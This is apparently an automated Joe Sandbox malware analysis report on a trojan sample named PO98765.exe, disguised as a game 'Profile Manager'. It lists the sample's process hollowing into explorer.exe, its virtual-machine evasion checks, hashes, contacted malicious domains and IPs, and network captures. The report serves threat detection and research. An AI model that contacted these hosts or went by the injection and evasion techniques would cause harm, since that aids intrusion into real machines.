          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing 13 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

Behavior Graph

Behavior Graph ID: 323082; Sample: PO98765.exe; Start date: 26/11/2020; Architecture: WINDOWS; Score: 100

Start
  DNS/IP: www.punebites.com, www.edlasyarns.com, punebites.com
  Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 5 other signatures
  started PO98765.exe
    Dropped file: C:\Users\user\AppData\...\PO98765.exe.log, ASCII
    Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
    started PO98765.exe
      Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
      injected explorer.exe
        DNS/IP: westhighlandwaytours.com 34.102.136.180, ports 49709, 80, GOOGLEUS United States; shops.myshopify.com 23.227.38.74, ports 49712, 80, CLOUDFLARENETUS Canada; 4 other IPs or domains
        Signatures: System process connects to network (likely due to code injection or exploit)
        started mstsc.exe
          Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
          started cmd.exe
            started conhost.exe

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
PO98765.exe | 14% | Virustotal |
PO98765.exe | 10% | ReversingLabs | Win32.Trojan.Wacatac

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

Source | Detection | Scanner | Label
1.2.PO98765.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

Source | Detection | Scanner | Label
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.edlasyarns.com | 160.122.150.218 | true | true | | unknown
punebites.com | 81.19.215.15 | true | false | | unknown
westhighlandwaytours.com | 34.102.136.180 | true | true | | unknown
shops.myshopify.com | 23.227.38.74 | true | true | | unknown
www.bloochy.com | unknown | unknown | true | | unknown
www.westhighlandwaytours.com | unknown | unknown | true | | unknown
www.punebites.com | unknown | unknown | true | | unknown

                        URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com | explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designersG | explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designers/? | explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.tiro.com | explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.goodfont.co.kr | explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-user.html | explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.%s.comPA | explorer.exe, 00000002.00000002.924230430.0000000002B50000.00000002.00000001.sdmp | false | URL Reputation: safe | low
http://www.fonts.com | explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.sandoll.co.kr | explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | PO98765.exe, 00000000.00000002.678398737.0000000002741000.00000004.00000001.sdmp | false | | high
http://www.sakkal.com | explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown

                                              Contacted IPs


                                              Public

IP | Domain | Country | ASN | ASN Name | Malicious
160.122.150.218 | unknown | South Africa | 137951 | CLAYERLIMITED-AS-APClayerLimitedHK | true
34.102.136.180 | unknown | United States | 15169 | GOOGLEUS | true
23.227.38.74 | unknown | Canada | 13335 | CLOUDFLARENETUS | true

                                              General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 323082
Start date: 26.11.2020
Start time: 09:55:26
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 56s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: PO98765.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/1@5/3
EGA Information: Failed
HDC Information:
• Successful, ratio: 16.7% (good quality ratio 14.7%)
• Quality average: 72%
• Quality standard deviation: 32.3%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Excluded IPs from analysis (whitelisted): 52.255.188.83, 104.42.151.234, 168.61.161.212, 52.147.198.201
• Excluded domains from analysis (whitelisted): skypedataprdcoleus16.cloudapp.net, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, watson.telemetry.microsoft.com, skypedataprdcolwus16.cloudapp.net
• Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                              Simulations

                                              Behavior and APIs

Time | Type | Description
09:56:26 | API Interceptor | 1x Sleep call for process: PO98765.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              Domains

                                              ASN


                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO98765.exe.log
                                              Process: C:\Users\user\Desktop\PO98765.exe
                                              File Type: ASCII text, with CRLF line terminators
                                              Category: dropped
                                              Size (bytes): 1406
                                              Entropy (8bit): 5.341099307467139
                                              Encrypted: false
                                              SSDEEP: 24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmER:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHg
                                              MD5: E5FA1A53BA6D70E18192AF6AF7CFDBFA
                                              SHA1: 1C076481F11366751B8DA795C98A54DE8D1D82D5
                                              SHA-256: 1D7BAA6D3EB5A504FD4652BC01A0864DEE898D35D9E29D03EB4A60B0D6405D83
                                              SHA-512: 77850814E24DB48E3DDF9DF5B6A8110EE1A823BAABA800F89CD353EAC7F72E48B13F3F4A4DC8E5F0FAA707A7F14ED90577CF1CB106A0422F0BEDD1EFD2E940E4
                                              Malicious: true
                                              Reputation: moderate, very likely benign file
                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                              Static File Info

                                              General

                                              File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit): 7.3134929233666135
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Windows Screen Saver (13104/52) 0.07%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              File name: PO98765.exe
                                              File size: 688128
                                              MD5: 137ec800f9c49390f2f225ab22774443
                                              SHA1: 2f3f1a1615b625cb1daf8d1e4a3eba208a89e30d
                                              SHA256: 60263179eccb843c5aa38040ebd2483b29a3923a94987f006561488e5d0f1d96
                                              SHA512: 41b84ea68ec7c2b9fd5205a1ce00fcbfbe03d82efb4ae7ca9030f643aae341ff32b23974a23db5f8c0fbb423b569e838c10da56f185cbf4e70f1c634e8b570ec
                                              SSDEEP: 12288:WTrUNQIc2+gkNmZh18NVxQ6Ssz2UAP85zPvE:jlc2BNP6NVGRsI85LvE
                                              File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z._..............P..v..........N.... ........@.. ....................................@................................

                                              File Icon

                                              Icon Hash: 00828e8e8686b000

                                              Static PE Info

                                              General

                                              Entrypoint: 0x4a944e
                                              Entrypoint Section: .text
                                              Digitally signed: false
                                              Imagebase: 0x400000
                                              Subsystem: windows gui
                                              Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
                                              DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                              Time Stamp: 0x5FBF5AE3 [Thu Nov 26 07:36:03 2020 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version: v4.0.30319
                                              OS Version Major: 4
                                              OS Version Minor: 0
                                              File Version Major: 4
                                              File Version Minor: 0
                                              Subsystem Version Major: 4
                                              Subsystem Version Minor: 0
                                              Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

                                              Entrypoint Preview

                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al

                                              Data Directories

                                              Name | Virtual Address | Virtual Size | Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa93fc | 0x4f | .text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xaa000 | 0x480 | .rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xac000 | 0xc | .reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                              Sections

                                              Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                              .text | 0x2000 | 0xa7454 | 0xa7600 | False | 0.726912574683 | data | 7.32069962776 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                              .rsrc | 0xaa000 | 0x480 | 0x600 | False | 0.309244791667 | data | 2.62722465362 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc | 0xac000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              Name | RVA | Size | Type | Language | Country
                                              RT_VERSION | 0xaa058 | 0x424 | data | |

                                              Imports

                                              DLL | Import
                                              mscoree.dll | _CorExeMain

                                              Version Infos

                                              Description | Data
                                              Translation | 0x0000 0x04b0
                                              LegalCopyright | Copyright Token Software 2014 - 2020 (GNU GPL)
                                              Assembly Version | 1.0.0.0
                                              InternalName | BfRf.exe
                                              FileVersion | 1.0.0.0
                                              CompanyName | Token Softwares
                                              LegalTrademarks |
                                              Comments | Manages the creation and activation of profiles in the X3 games created by Egosoft.
                                              ProductName | Profile Manager
                                              ProductVersion | 1.0.0.0
                                              FileDescription | Profile Manager
                                              OriginalFilename | BfRf.exe

                                              Network Behavior

                                              Snort IDS Alerts

                                              Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                              11/26/20-09:57:21.714305 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49709 | 34.102.136.180 | 192.168.2.4
                                              11/26/20-09:57:42.153271 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49712 | 23.227.38.74 | 192.168.2.4

                                              Network Port Distribution

                                              TCP Packets

                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Nov 26, 2020 09:57:21.582588911 CET | 49709 | 80 | 192.168.2.4 | 34.102.136.180
                                              Nov 26, 2020 09:57:21.598923922 CET | 80 | 49709 | 34.102.136.180 | 192.168.2.4
                                              Nov 26, 2020 09:57:21.599069118 CET | 49709 | 80 | 192.168.2.4 | 34.102.136.180
                                              Nov 26, 2020 09:57:21.599386930 CET | 49709 | 80 | 192.168.2.4 | 34.102.136.180
                                              Nov 26, 2020 09:57:21.615598917 CET | 80 | 49709 | 34.102.136.180 | 192.168.2.4
                                              Nov 26, 2020 09:57:21.714304924 CET | 80 | 49709 | 34.102.136.180 | 192.168.2.4
                                              Nov 26, 2020 09:57:21.714354992 CET | 80 | 49709 | 34.102.136.180 | 192.168.2.4
                                              Nov 26, 2020 09:57:21.714684963 CET | 49709 | 80 | 192.168.2.4 | 34.102.136.180
                                              Nov 26, 2020 09:57:21.714863062 CET | 49709 | 80 | 192.168.2.4 | 34.102.136.180
                                              Nov 26, 2020 09:57:21.731035948 CET | 80 | 49709 | 34.102.136.180 | 192.168.2.4
                                              Nov 26, 2020 09:57:41.965548038 CET | 49712 | 80 | 192.168.2.4 | 23.227.38.74
                                              Nov 26, 2020 09:57:41.981944084 CET | 80 | 49712 | 23.227.38.74 | 192.168.2.4
                                              Nov 26, 2020 09:57:41.985135078 CET | 49712 | 80 | 192.168.2.4 | 23.227.38.74
                                              Nov 26, 2020 09:57:41.985487938 CET | 49712 | 80 | 192.168.2.4 | 23.227.38.74
                                              Nov 26, 2020 09:57:42.001837969 CET | 80 | 49712 | 23.227.38.74 | 192.168.2.4
                                              Nov 26, 2020 09:57:42.153270960 CET | 80 | 49712 | 23.227.38.74 | 192.168.2.4
                                              Nov 26, 2020 09:57:42.153326035 CET | 80 | 49712 | 23.227.38.74 | 192.168.2.4
                                              Nov 26, 2020 09:57:42.153441906 CET | 80 | 49712 | 23.227.38.74 | 192.168.2.4
                                              Nov 26, 2020 09:57:42.153491974 CET | 80 | 49712 | 23.227.38.74 | 192.168.2.4
                                              Nov 26, 2020 09:57:42.153522015 CET | 80 | 49712 | 23.227.38.74 | 192.168.2.4
                                              Nov 26, 2020 09:57:42.153549910 CET | 80 | 49712 | 23.227.38.74 | 192.168.2.4
                                              Nov 26, 2020 09:57:42.153578997 CET | 80 | 49712 | 23.227.38.74 | 192.168.2.4
                                              Nov 26, 2020 09:57:42.153582096 CET | 49712 | 80 | 192.168.2.4 | 23.227.38.74
                                              Nov 26, 2020 09:57:42.153647900 CET | 49712 | 80 | 192.168.2.4 | 23.227.38.74
                                              Nov 26, 2020 09:57:42.153775930 CET | 49712 | 80 | 192.168.2.4 | 23.227.38.74
                                              Nov 26, 2020 09:57:42.154025078 CET | 49712 | 80 | 192.168.2.4 | 23.227.38.74
                                              Nov 26, 2020 09:58:02.675896883 CET | 49715 | 80 | 192.168.2.4 | 160.122.150.218
                                              Nov 26, 2020 09:58:05.676021099 CET | 49715 | 80 | 192.168.2.4 | 160.122.150.218
                                              Nov 26, 2020 09:58:11.676599026 CET | 49715 | 80 | 192.168.2.4 | 160.122.150.218
                                              Nov 26, 2020 09:58:24.791840076 CET | 49718 | 80 | 192.168.2.4 | 160.122.150.218
                                              Nov 26, 2020 09:58:27.803355932 CET | 49718 | 80 | 192.168.2.4 | 160.122.150.218

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 26, 2020 09:56:46.876534939 CET | 49182 | 53 | 192.168.2.4 | 8.8.8.8
Nov 26, 2020 09:56:46.903584957 CET | 53 | 49182 | 8.8.8.8 | 192.168.2.4
Nov 26, 2020 09:56:53.255492926 CET | 59920 | 53 | 192.168.2.4 | 8.8.8.8
Nov 26, 2020 09:56:53.282816887 CET | 53 | 59920 | 8.8.8.8 | 192.168.2.4
Nov 26, 2020 09:57:21.534744024 CET | 57458 | 53 | 192.168.2.4 | 8.8.8.8
Nov 26, 2020 09:57:21.574743986 CET | 53 | 57458 | 8.8.8.8 | 192.168.2.4
Nov 26, 2020 09:57:22.688765049 CET | 50579 | 53 | 192.168.2.4 | 8.8.8.8
Nov 26, 2020 09:57:22.715966940 CET | 53 | 50579 | 8.8.8.8 | 192.168.2.4
Nov 26, 2020 09:57:24.885966063 CET | 51703 | 53 | 192.168.2.4 | 8.8.8.8
Nov 26, 2020 09:57:24.912981987 CET | 53 | 51703 | 8.8.8.8 | 192.168.2.4
Nov 26, 2020 09:57:41.923377037 CET | 65248 | 53 | 192.168.2.4 | 8.8.8.8
Nov 26, 2020 09:57:41.963454962 CET | 53 | 65248 | 8.8.8.8 | 192.168.2.4
Nov 26, 2020 09:57:51.821472883 CET | 53723 | 53 | 192.168.2.4 | 8.8.8.8
Nov 26, 2020 09:57:51.848748922 CET | 53 | 53723 | 8.8.8.8 | 192.168.2.4
Nov 26, 2020 09:57:52.637336016 CET | 64646 | 53 | 192.168.2.4 | 8.8.8.8
Nov 26, 2020 09:57:52.664422989 CET | 53 | 64646 | 8.8.8.8 | 192.168.2.4
Nov 26, 2020 09:58:02.332180977 CET | 65298 | 53 | 192.168.2.4 | 8.8.8.8
Nov 26, 2020 09:58:02.674093962 CET | 53 | 65298 | 8.8.8.8 | 192.168.2.4
Nov 26, 2020 09:58:05.489701033 CET | 59123 | 53 | 192.168.2.4 | 8.8.8.8
Nov 26, 2020 09:58:05.516762972 CET | 53 | 59123 | 8.8.8.8 | 192.168.2.4
Nov 26, 2020 09:58:18.561975956 CET | 54531 | 53 | 192.168.2.4 | 8.8.8.8
Nov 26, 2020 09:58:18.589188099 CET | 53 | 54531 | 8.8.8.8 | 192.168.2.4
Nov 26, 2020 09:58:24.445055008 CET | 49714 | 53 | 192.168.2.4 | 8.8.8.8
Nov 26, 2020 09:58:24.787240982 CET | 53 | 49714 | 8.8.8.8 | 192.168.2.4
Nov 26, 2020 09:58:25.697844028 CET | 58028 | 53 | 192.168.2.4 | 8.8.8.8
Nov 26, 2020 09:58:25.753426075 CET | 53 | 58028 | 8.8.8.8 | 192.168.2.4
Nov 26, 2020 09:58:30.835995913 CET | 53097 | 53 | 192.168.2.4 | 8.8.8.8
Nov 26, 2020 09:58:30.863044977 CET | 53 | 53097 | 8.8.8.8 | 192.168.2.4

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 26, 2020 09:57:21.534744024 CET | 192.168.2.4 | 8.8.8.8 | 0x6df1 | Standard query (0) | www.westhighlandwaytours.com | A (IP address) | IN (0x0001)
Nov 26, 2020 09:57:41.923377037 CET | 192.168.2.4 | 8.8.8.8 | 0xed31 | Standard query (0) | www.bloochy.com | A (IP address) | IN (0x0001)
Nov 26, 2020 09:58:02.332180977 CET | 192.168.2.4 | 8.8.8.8 | 0x4f61 | Standard query (0) | www.edlasyarns.com | A (IP address) | IN (0x0001)
Nov 26, 2020 09:58:24.445055008 CET | 192.168.2.4 | 8.8.8.8 | 0x19c1 | Standard query (0) | www.edlasyarns.com | A (IP address) | IN (0x0001)
Nov 26, 2020 09:58:25.697844028 CET | 192.168.2.4 | 8.8.8.8 | 0x149a | Standard query (0) | www.punebites.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Nov 26, 2020 09:57:21.574743986 CET | 8.8.8.8 | 192.168.2.4 | 0x6df1 | No error (0) | www.westhighlandwaytours.com | westhighlandwaytours.com | - | CNAME (Canonical name) | IN (0x0001)
Nov 26, 2020 09:57:21.574743986 CET | 8.8.8.8 | 192.168.2.4 | 0x6df1 | No error (0) | westhighlandwaytours.com | - | 34.102.136.180 | A (IP address) | IN (0x0001)
Nov 26, 2020 09:57:41.963454962 CET | 8.8.8.8 | 192.168.2.4 | 0xed31 | No error (0) | www.bloochy.com | bloochy.myshopify.com | - | CNAME (Canonical name) | IN (0x0001)
Nov 26, 2020 09:57:41.963454962 CET | 8.8.8.8 | 192.168.2.4 | 0xed31 | No error (0) | bloochy.myshopify.com | shops.myshopify.com | - | CNAME (Canonical name) | IN (0x0001)
Nov 26, 2020 09:57:41.963454962 CET | 8.8.8.8 | 192.168.2.4 | 0xed31 | No error (0) | shops.myshopify.com | - | 23.227.38.74 | A (IP address) | IN (0x0001)
Nov 26, 2020 09:58:02.674093962 CET | 8.8.8.8 | 192.168.2.4 | 0x4f61 | No error (0) | www.edlasyarns.com | - | 160.122.150.218 | A (IP address) | IN (0x0001)
Nov 26, 2020 09:58:24.787240982 CET | 8.8.8.8 | 192.168.2.4 | 0x19c1 | No error (0) | www.edlasyarns.com | - | 160.122.150.218 | A (IP address) | IN (0x0001)
Nov 26, 2020 09:58:25.753426075 CET | 8.8.8.8 | 192.168.2.4 | 0x149a | No error (0) | www.punebites.com | punebites.com | - | CNAME (Canonical name) | IN (0x0001)
Nov 26, 2020 09:58:25.753426075 CET | 8.8.8.8 | 192.168.2.4 | 0x149a | No error (0) | punebites.com | - | 81.19.215.15 | A (IP address) | IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • www.westhighlandwaytours.com
                                              • www.bloochy.com

                                              HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49709 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
